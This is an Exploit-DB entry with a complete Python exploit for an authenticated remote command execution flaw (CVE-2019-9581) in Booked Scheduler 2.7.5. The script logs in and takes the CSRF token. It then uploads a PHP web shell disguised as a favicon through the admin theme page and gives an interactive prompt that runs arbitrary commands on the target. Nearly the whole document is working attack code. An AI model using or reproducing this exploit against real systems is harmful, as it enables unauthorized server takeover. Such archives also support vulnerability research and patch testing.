Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)

EDB-ID:

50594


Author:

0sunday

Type:

webapps


Platform:

PHP

Date:

2021-12-14


# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
# Vulnerability founder: AkkuS
# Date: 13/12/2021
# Exploit Author: 0sunday
# Vendor Homepage: https://www.bookedscheduler.com/
# Software Link: N/A
# Version: Booked Scheduler 2.7.5
# Tester on: Kali 2021.2
# CVE: CVE-2019-9581

#!/usr/bin/python3

import sys
import requests
from random import randint


def login():
	login_payload = {
		"email": username,
		"password": password,
		"login": "submit",
		#"language": "en_us"
	}

	login_req = request.post(
		 target+"/booked/Web/index.php",
		 login_payload,
		 verify=False,
		 allow_redirects=True
	 )

	if login_req.status_code == 200:
		print ("[+] Logged in successfully.")
	else:
		print ("[-] Wrong credentials !")
		exit()


	return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]



def upload_shell(csrf):

	boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))

	_headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
				"Accept-Language": "en-US,en;q=0.5",
				"X-Requested-With": "XMLHttpRequest",
				"Content-Type": "multipart/form-data; boundary=---------------------------"+boundary,
				"Origin": target,
				"Connection": "close",
				"Referer": target + "/booked/Web/admin/manage_theme.php?update"

				}

	data =  "-----------------------------"+boundary+"\r\n"
	data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n"
	data += "-----------------------------"+boundary+"\r\n"
	data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n"
	data += "Content-Type: application/x-php\r\n\n"
	data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n"
	data += "-----------------------------"+boundary+"\r\n"
	data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n"
	data += "-----------------------------"+boundary+"\r\n"
	data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n"
	data += csrf + "\r\n"
	data += "-----------------------------"+boundary+"--\r\n"

	# In case you need some debugging
	_proxies = {
		'http': 'http://127.0.0.1:8080'
	}

	upload_req = request.post(
		 target+"/booked/Web/admin/manage_theme.php?action=update",
		 headers = _headers,
		 data = data
		 #proxies=_proxies
		 )


def shell():
	shell_req = request.get(target+"/booked/Web/custom-favicon.php")

	if shell_req.status_code == 200:

		print("[+] Uploaded shell successfully")
		print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
	else:
		print("[-] Shell uploading failed")
		exit(1)

	print()
	cmd = ''
	while(cmd != 'exit'):
		cmd = input("$ ")
		shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd)
		print(shell_req.text)


if len(sys.argv) != 4:
    print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password")
    exit()

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]


request = requests.session()

csrf = login()
upload_shell(csrf)
shell()